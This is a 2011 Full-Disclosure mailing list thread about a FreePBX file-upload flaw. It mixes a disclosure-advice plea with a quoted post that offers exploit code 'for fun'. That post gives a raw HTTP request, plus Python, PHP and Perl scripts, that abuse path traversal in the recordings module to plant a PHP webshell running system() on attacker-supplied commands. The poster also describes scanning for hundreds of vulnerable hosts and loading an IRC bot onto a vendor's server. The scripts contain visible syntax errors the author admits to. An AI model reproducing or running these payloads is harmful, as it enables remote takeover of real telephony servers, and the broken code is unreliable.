hello, In regards to this FreePBX exploit, wich i PoC'd, has anyone tried to use the PoC ? If so, were you able to just axcs the folder,with OUT the admin privs. Im just abit confused, because the poc i did seems to have same prpblem,altho, can apparently access the webshell, using the method described in the older PoC (wich was only a month ago or so now)...
The Team who released the 'admin only' PoC, did not seem to do much about showing theyre request session header details, so, i cannot see what they are reporting here :s this PoC , i found about 1mth ago, was just the session info, and header data, the person who asked me to look into it more, told me it was 'working' with NO admin privs, you just have to add the line in, wich points to YOUR own /folder/ , wich, can be done thru manipulating the header data,and config.php of the actual freepbx. i also did a 'sweep' scan, on one range alone, i foubndapprox 400-500 of this FreePBX,all linux... On another note, I just found a MASSIVE RFI/RCE in almost EVERY torrent site availabkle, actually, was a priv one, i just do not know wether to help the admin, because last time i did this ( bur.st networking, reported 4 PoC's to them, was also a donating user) , they BANNED me for explaining it... Is it safer to post to this list ? Or, contact the vendor :s It seems that when you contact vendors, another case, was a he.net box,wich STILL is vulnerable, the he.net admin said to me the code was 'meant to be that way', and allowed remote injection of a shell.. I tried to explain this, and they said again, was normal and not a problem, however, then loaded as simple php bot, and made it join irc, then started the PID about 20 times, the admin finally looked into it, BUT, i was not thanked, not even close... lol, infact, suspicion again.. this has now happened to me, about 5 times, starting from bsd-secteam in early 2000's, about a cat command issue, wich allowed me to replace master.;pass file... even then, i had problems explaining to Colin Percival about it, he could not 'see' my PoC... yet, it seems that he has patched it :s this wa also a problem in gentoo, and about 3 other distros, i could bring that up even , and, yes, 'cat' command, i think because it was so simple, it was unbelievable to them... I am very confused about how/what/whop to now contact, and im sitting on 3 MS exploits, one of wich, attacks theyre patches!! i dont know what todo!! please offer me any advice... Also, please look into this seperate PoC for freepbx, as it apparently is working, altho , i do not TRY to make peoples websites screwed etc,i am happy to do a Poc but, i dont run local webserver at moment, am in the midst of changing raqs over.. I am just after some help in regards to this. Cheers, xd / dru On 10 June 2011 09:08, -= Glowing Doom =- <[email protected]> wrote: > ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke > and should have looked... just look at part1 and part2 :) it is pretty > simple to fix... > > also when uploading, you create your own /folder/ , using this method > anyhow.. > > > > On 10 June 2011 08:59, -= Glowing Doom =- <[email protected]> wrote: > >> Hello... >> I wrote a PoC code, for similar bug in this application, about 3months >> ago... unfortunately, i did not bother to put it on here because well, it >> was nothing much.. but since this 'admin' module has appeared, i will add my >> codes to the thing...: this needs for PBX to 'record' ,notsure if an admin >> module is needed..it seems to ONLY look for the recordings... anyhow have >> fun.. admin i believe :)... nice try to find the sploit guys, i have only >> posted it on my blogs and pastebin about 400times in the past 4months... i >> guess i will put it here next time.. here is some codes for you..: >> ------------------------------------------------------------------------------------------------------- >> PoC >> The HTTP request below illustrates the upload of a phpshell:: >> >> POST /admin/config.php HTTP/1.1 >> Host: 10.10.1.3 >> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; >> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7 >> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> Accept-Language: en-us,en;q=0.5 >> Accept-Encoding: gzip,deflate >> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 >> Keep-Alive: 300 >> Proxy-Connection: keep-alive >> Referer: http://10.10.1.3/admin/config.php >> Cookie: ARI=cookieValue; PHPSESSID=cookieValue >> Authorization: Basic base64auth >> Content-Type: multipart/form-data; >> boundary=---------------------------5991806838789183981588991120 >> Content-Length: 116089 >> >> -----------------------------5991806838789183981588991120 >> Content-Disposition: form-data; name="display" >> >> recordings >> -----------------------------5991806838789183981588991120 >> Content-Disposition: form-data; name="action" >> >> recordings_start >> -----------------------------5991806838789183981588991120 >> Content-Disposition: form-data; name="usersnum" >> >> ../../../../../var/www/html/admin/SpiderLabs >> -----------------------------5991806838789183981588991120 >> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php" >> Content-Type: application/octet-stream >> <?php >> /* WebShell code goes here */ >> ?> >> -----------------------------5991806838789183981588991120-- >> >> OK SO... >> >> In python form: >> #!/usr/bin/env python >> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys >> >> host = $host >> port = 80 >> >> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n') >> s.connectHTTP((host,port)) >> s.send( >> 'POST /admin/config.php HTTP/1.1\r\n' >> 'Host: ' + host + '\r\n' >> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US; >> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n' >> 'Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n' >> 'Accept-Language: en-us,en;q=0.5\r\n' >> 'Accept-Encoding: gzip,deflate\r\n' >> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n' >> 'Keep-Alive: 300\r\n' >> 'Proxy-Connection: keep-alive\r\n' >> 'Referer: http://' + host + '/admin/config.php\r\n' >> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n' >> 'Authorization: Basic base64auth\r\n') >> 'Content-Type: multipart/form-data;\r\n' >> 'boundary=---------------------------5991806838789183981588991120\r\n' >> 'Content-Type: multipart/form-data;\r\n' >> 'boundary=---------------------------5991806838789183981588991120\r\n' >> 'Content-Length: 116089\r\n' >> '\r\n' >> '-----------------------------5991806838789183981588991120\r\n' >> 'Content-Disposition: form-data; name="display"\r\n' >> '\r\n' >> 'recordings\r\n' >> '-----------------------------5991806838789183981588991120\r\n' >> 'Content-Disposition: form-data; name="action"\r\n' >> '\r\n' >> 'recordings_start\r\n' >> '-----------------------------5991806838789183981588991120\r\n' >> 'Content-Disposition: form-data; name="usersnum"\r\n' >> '\r\n' >> '../../../../../var/www/html/admin/zmeu.php\r\n' >> '-----------------------------5991806838789183981588991120\r\n' >> 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n' >> 'Content-Type: application/octet-stream\r\n' >> '\r\n' >> '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n' >> '-----------------------------5991806838789183981588991120--\r\n' >> >> and... >> >> IN php: >> >> <?php >> echo "\n\n"; >> echo >> "+-------------------------------------------------------------------------+\r\n"; >> echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n"; >> echo "| Usage: php exploit.php site.com >> |\r\n"; >> echo >> "+-------------------------------------------------------------------------+\r\n"; >> echo "\n"; >> echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n"; >> $code = trim(fgets(STDIN)); >> $socket = @fsockopen($argv[1], 80, $eno, $estr, 10); >> if(!$socket) { >> die("[-] Couldnt connect to: ".$argv[1].". Operation aborted."); >> } >> $part1 = "POST /admin/config.php HTTP/1.1\r\n"; >> $part1 .= "Host: " . $argv[1] . "\r\n"; >> $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X >> 10.4.6)\r\n"; >> $part1 .= "Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; >> $part1 .= "Accept-Language: en-us,en;q=0.5\r\n"; >> $part1 .= "Accept-Encoding: gzip,deflate\r\n"; >> $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; >> $part1 .= "Connection: keep-alive\r\n"; >> $part1 .= "Keep-Alive: 300\r\n"; >> $part1 .= "Proxy-Connection: keep-alive\r\n"; >> $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";; >> $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n"; >> $part1 .= "Authorization: Basic base64auth\r\n"; >> $part1 .= "Content-Type : multipart/form-data;\r\n"; >> $part2 = >> "boundary=-----------------------------5991806838789183981588991120--\r\n"; >> $part1 .= "Content-Type : multipart/form-data;\r\n"; >> $part2 = >> "boundary=-----------------------------5991806838789183981588991120--\r\n"; >> $part2 = "Content-Length: 116089\r\n"; >> $part2 .= "\r\n"; >> $part2 .= >> "-----------------------------5991806838789183981588991120\r\n"; >> $part2 .= "Content-Disposition: form-data; >> name=\"display\"\r\n"; >> $part2 .= "\r\n"; >> $part2 .= "recordings\r\n"; >> $part2 .= >> "---------------------------5991806838789183981588991120\r\n"; >> $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n"; >> $part2 .= "\r\n"; >> $part2 .= "recordings_start\r\n"; >> $part2 .= >> "---------------------------5991806838789183981588991120\r\n"; >> $part2 .= "Content-Disposition: form-data; >> name=\"usersnum\"\r\n"; >> $part2 .= "\r\n"; >> $part2 .= "Content-Disposition: form-data; >> name=\"../../../../../var/www/html/admin/xd\"\r\n"; >> $part2 .= >> "---------------------------5991806838789183981588991120\r\n"; >> $part2 .= "Content-Disposition: form-data; name=\"ivrfile\"; >> filename=\"shell.php\"\r\n"; >> $part2 .= "Content-Type: application/octet-stream\r\n"; >> $part2 .= "\r\n"; >> $part2 .= "<?php echo \'<pre>\' + system(\'$code\') + >> \'</pre>\'; ?>\r\n"; >> $part2 .= >> "-----------------------------5991806838789183981588991120--\r\n"; >> $part1 .= $part2; >> fwrite($socket, $part1); >> echo "[!] Check the upload folder (/var/www/html/admin/xd) .."; >> } else { >> echo "\n\n"; >> echo "+---------------------------------------------------+\r\n"; >> echo "| Usage: php exploit.php site.com |\r\n"; >> echo "+---------------------------------------------------+\r\n"; >> echo "\n\n"; >> } >> ?> >> >> and in perl.. >> >> #!/usr/bin/perl >> use IO::Socket::INET; >> use Crypt::SSLeay; >> use Net::SSL; >> >> sub usage { >> print "perl $0 <Host> <Cmd>\n"; >> exit(1); >> } >> my($host, $cmd) = @ARGV or usage(); >> print "[+] Connecting to host...\n"; >> my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort >> => 80,Timeout => 10) or die "[-] Connect error..\n"; >> if(!sock) { >> print "[-] Non-SSL PBX NOT HERE!\n"; >> exit(-1); >> else { >> $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort => >> 443,Timeout => 10) or die "[-] Connect error..\n"; >> print "[-] SSL PBX NOT HERE!\n"; >> exit(-1); >> } >> print "[+] Connected.. Sending Buffer\n"; >> my $temp= >> "POST /admin/config.php HTTP/1.1\n". >> "Host: $host:80/\n". >> "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n". >> "Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n". >> "Accept-Language: en-us,en;q=0.5\n". >> "Accept-Encoding: gzip,deflate\n". >> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n". >> "Keep-Alive: 300\n". >> "Proxy-Connection: keep-alive\n". >> "Referer: http://$host/admin/config.php\n";. >> "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n". >> "Authorization: Basic base64auth\n". >> "Connection: keep-alive\n". >> "Content-Type : multipart/form-data;\n". >> "---------------------------5991806838789183981588991120\n". >> "Content-Length: 116089\n". >> "\n". >> "Content-Disposition: form-data; name=\"display\"\n". >> "recordings\n". >> "\n". >> "---------------------------5991806838789183981588991120\n". >> "Content-Disposition: form-data; name=\"action\"\n". >> "recordings_start\n". >> "\n". >> "---------------------------5991806838789183981588991120\n". >> "Content-Disposition: form-data; name=\"usersnum\"\n". >> "\n". >> "---------------------------5991806838789183981588991120\n". >> "Content-Disposition: form-data; >> name=\"../../../../../var/www/html/admin/xd\"\n". >> "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n". >> "Content-Type: application/octet-stream\n". >> "\n". >> "<?php ". $cmd ." ?>\n". >> "-----------------------------5991806838789183981588991120--\n\n"; >> >> print "[+] Sent file 'shell.php' to act as webshell ..\n"; >> my $buffer_size=length($temp); >> $temp; >> my $answer=0; >> $buffer=~s/siz/$buffer_size/g; >> print $sock $buffer; >> if ($sock) { >> print "[+] Buffer sent..running command: $cmd ..\n"; >> while ($answer=<$sock>) { >> print $answer; >> print results "[!] Server reply: $answer ..\n"; >> } >> } >> } >> >> have fun! Perl one is abit rough.. >> dru >> >> xd @ #haxNET @ Efnet >> >> (National LULZ day is here!) >> >> And for those guys who 'exploited' it... this PoC was released like >> 3months ago... what the hell are yu guiys on about, and where is even a >> HEADER showing explotation :S seems you have started a group but forgot to >> check this for previous bugs :) hehe... nomatter, it is now debugged for >> you. >> >> >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
